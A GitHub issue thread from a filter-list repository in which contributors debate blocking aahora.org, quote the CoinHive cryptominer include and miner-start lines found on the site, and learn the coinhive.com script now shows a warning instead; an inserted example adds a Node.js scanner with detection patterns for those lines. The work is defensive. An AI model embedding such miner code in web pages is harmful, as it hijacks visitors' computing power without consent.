DandelionSprout / adfilt

The place where I, DandelionSprout, store my web filter lists for countless topics, including my Nordic adblock list. As simple as that, really.

Malware domain #190

Closed iam-py-test closed 3 years ago

iam-py-test commented 3 years ago

Which entry/entries are you submitting?

aahora.org$all

Which things do they block, hide, or unbreak?

Malware. See these for more information:

- https://www.virustotal.com/gui/url/c5e388bc7c4f32f038e1ffaf055368c55b197251a9969c746a5f5ed7852f4ec4/detection
- https://www.fortiguard.com/webfilter?q=aahora.org
- https://safeweb.norton.com/report/show?url=aahora.org
- https://www.urlvoid.com/scan/aahora.org/
- https://quttera.com/detailed_report/aahora.org
- https://sitecheck.sucuri.net/results/aahora.org
- https://github.com/iam-py-test/my_filters_001/commit/b0b68fbd76522683cad733ee03f90d057e2b55eb
- https://quttera.com/detailed_report/coin-hive.com
- https://www.virustotal.com/gui/url/993da527c38d30523da34f9bcf14e3b3b82ef7ce0c1a90604fedcff7587c7ecc/detection
- https://www.virustotal.com/gui/domain/aahora.org/detection
- https://www.virustotal.com/gui/domain/www.aahora.org/detection
- https://www.virustotal.com/gui/url/9ff23b338f715e4c8ebeb2429c9145c3f433a9eb9d2a72fe3d62f3b80d133b27/detection
- https://www.scumware.org/search.php (Complete the captcha and enter aahora.org to get results; strangely does not allow the report to be linked)

The response: https://github.com/iam-py-test/Badware-Reports-1/blob/main/malware_page_content/malware_web20aahora.org.txt

Which of my lists are you submitting it to?

Antimalware

Which adblocker(s) and version did you use when writing and testing the entries?

Other(s):

Adblocker version(s): uBlock Origin development build v1.35.3b7

Which filterlists did you use? Failing to tell this will temporarily close the report until it has been told.

(Optional) Which browser(s) and version did you use?

Edge Version 91.0.864.37

liamengland1 commented 3 years ago

It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?

https://www.facebook.com/fundacionahora/

iam-py-test commented 3 years ago

> It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?
>
> https://www.facebook.com/fundacionahora/

I looked at the Facebook link and it looked official. The whole thing is in another language so I am not sure what it says. Maybe it got bought by someone else and is no longer malware, or is infected? @DandelionSprout what do you think?

> Which part of the site is malicious? Is there a specific page?

The scans flagged the homepage as having malware but most reported the host as malware too

iam-py-test commented 3 years ago

Looking at the code, it seems like maybe it was flagged because of this:

```javascript
var miner = new CoinHive.Anonymous('w9WpfXZJ9POkztDmNpey3zA1eq3I3Y2p', {throttle: 0.3});
```

Or this

```html
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
```
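
Added example, not code from the adfilt project or from the issue reporter: a small Node.js scanner that looks for the two CoinHive indicators quoted above in raw page HTML without executing it, and separates "library included" from "miner actually started", since after the coinhive.com takeover a stale include no longer proves mining. The sample page, the function names and the `MINER_SCRIPT_HOSTS` list are constructed for this illustration; only coinhive.com appears in the thread.

```javascript
// Added example (not from the adfilt project or the issue reporter).
// Scans raw HTML for CoinHive cryptojacking indicators; nothing is executed.
// The host list is an assumption for illustration: only coinhive.com is
// named in the issue thread.
const MINER_SCRIPT_HOSTS = new Set(['coinhive.com', 'www.coinhive.com']);

// <script ... src="..."> tags; group 1 is the src value.
const SCRIPT_SRC_RE = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
// CoinHive miner constructors; group 1 is the variant, group 2 the 32-char site key.
const MINER_CTOR_RE = /new\s+CoinHive\.(Anonymous|User|Token)\s*\(\s*["']([A-Za-z0-9]{32})["']/g;

// Resolve a (possibly relative) src to a lowercase hostname, or null if unparsable.
function hostOf(src) {
  try {
    return new URL(src, 'https://example.invalid/').hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Returns every indicator found, in document order per category.
function findMinerIndicators(html) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_SRC_RE)) {
    const host = hostOf(m[1]);
    if (host && MINER_SCRIPT_HOSTS.has(host)) {
      findings.push({ kind: 'library-include', host, src: m[1] });
    }
  }
  for (const m of html.matchAll(MINER_CTOR_RE)) {
    findings.push({ kind: 'miner-start', ctor: m[1], siteKey: m[2] });
  }
  return findings;
}

// Verdict: include + constructor means the page mines if the library host still
// serves mining code; an include alone is a stale reference worth noting, not proof.
function classify(findings) {
  const include = findings.some((f) => f.kind === 'library-include');
  const start = findings.some((f) => f.kind === 'miner-start');
  if (include && start) return 'cryptojacking-code-present';
  if (start) return 'miner-call-without-library';
  if (include) return 'stale-miner-library-reference';
  return 'clean';
}

// Constructed sample page: the two lines quoted in the issue, embedded in minimal HTML.
const SAMPLE_PAGE = `<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('w9WpfXZJ9POkztDmNpey3zA1eq3I3Y2p', {throttle: 0.3});
miner.start();
</script>
</head><body><p>Fundación Ahora</p></body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  const findings = findMinerIndicators(SAMPLE_PAGE);
  console.log(JSON.stringify(findings, null, 2));
  console.log('verdict:', classify(findings));
}
```

Run it with `node scan.js`; to check a live page, fetch the HTML first and pass the string to `findMinerIndicators`. The regexes are deliberately narrow so that a hit is explainable in a list-submission like this one; obfuscated loaders will not match and still need a manual look.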

iam-py-test commented 3 years ago

@llacb47 @DandelionSprout should I close this issue or do you think further investigation is needed?

iam-py-test commented 3 years ago

It looks like the CoinHive script at https://coinhive.com/lib/coinhive.min.js was replaced with another script:

```javascript
// Credit to https://w3bits.com/javascript-modal/

let createModal = (modalContent) => {
  let modal = document.createElement('div'),
    modalStyle = document.createElement('style'),
    modalCSS = '.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; }  .js-modal-inner a { color: #000; text-decoration: underline; } .js-modal-close{ position: absolute; top: -10px; right: 0px; background-color: black; color: #eee; border-width: 0; font-size: 10px; height: 24px; width: 24px; border-radius: 100%; text-align: center; font-family: Arial; cursor: pointer;}',
    modalClose = '<button class="js-modal-close" id="js_modal_close">X</button>',
    theBody = document.getElementsByTagName('body')[0],
    theHead = document.getElementsByTagName('head')[0];

  // Add content and attributes to the modal
  modal.setAttribute('class', 'js-modal');
  modal.innerHTML = '<div class="js-modal-inner">' + modalContent + modalClose + '</div>';
  theBody.appendChild(modal);

  modalClose = document.querySelector('#js_modal_close');

  // Add the modal styles dynamically
  if(modalStyle.styleSheet){
    modalStyle.styleSheet.cssText = modalCSS;
  } else {
    modalStyle.appendChild(document.createTextNode(modalCSS));
  }
  theHead.appendChild(modalStyle);

  // Close the modal on button-click
  if(modalClose) {
    modalClose.addEventListener('click', function() {
      modal.remove();
      modalStyle.remove();
    });
  }
}

// Show it up when loading starts
window.addEventListener('load', function() {
  /* Remember to escape the characters to their respective valid HTML entities, for eg. ' will become \' */
  createModal('This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.');
});
```

iam-py-test commented 3 years ago

Closing issue

DandelionSprout commented 3 years ago

Fun fact: Microsoft Defender on my PC seemingly detects the scripts and script-lines above, as if my GitHub E-mail notifications with them are themselves CoinHive viruses. 😅

DandelionSprout commented 3 years ago

The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/

As such, I at least presume that there's no immediate need to add aahora.org to my list.

iam-py-test commented 3 years ago

> The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/
>
> As such, I at least presume that there's no immediate need to add aahora.org to my list.

Yes. I am sorry for the error; I did not realize that